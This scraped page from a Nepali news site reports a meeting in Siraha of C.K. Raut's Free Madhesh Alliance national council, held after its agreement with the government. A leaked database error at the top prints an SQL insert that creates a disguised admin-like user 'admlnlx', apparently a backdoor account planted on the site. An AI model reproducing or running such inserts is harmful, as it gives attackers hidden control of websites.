WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BW0rQf0e22TOnoatO7Is4i7.TKgSau/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:05:47', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज सम्बाददाता, ३ चैत्र, सिरहा । सरकारसँग ११ बुँदे समझदारीपछि मूलधारको राजनीतिमा प्रदेश गरेका डा. सीके राउत नेतृत्वको स्वतन्त्र मधेश गठबन्धनको राष्ट्रिय परिषदको बैठक सुरु भएको छ । पहिलो पटक सार्वजनिक स्थलमा कडा सुरक्षाबीच बैठक सुरु भएको हो ।
मधेशको २२ जिल्लाबाट २ सय प्रतिनिधि तथा पर्यवेक्षक बैठकमा सहभागि भएको गठबन्धनले जनाएको छ । बैठक स्थलमा गठबन्धनका नेताहरुलाई परिचयपत्रको रुपमा नागरिकता र आफ्नो मोबाईल बिना प्रवेश गराइएको थियो ।
सरकारसँग ११ बुँदे सहमतिपछि पहिलो पटक परिषदको बैठक बस्न लागेको र यस वैठकबाट गठबन्धनको आगामी राणनीति तय गर्न गम्भीररुपमा बहस चल्ने भएकाले मोबाइल निषेध गरिएको पनि गठबन्धनले जनाएको छ ।
सिरहाको लहान नगरपालिका वडा नम्बर ७ स्थित मारवाडी सेवा सदनमा आइतबार बिहान ११ बजेदेखि शुरु बैठकको सुरुवात नेपालको राष्ट्रिय गानबाट गरिएको थियो ।
राष्ट्रिय गान ‘सयौं थुङ्गा फूलका हामी..’ बजाइएपछि संयोजक डा. राउतले दीप प्रजल्वन गर्दै स्वं राममनोहर यादवको तस्विरमा माल्यार्पण गरेका थिए ।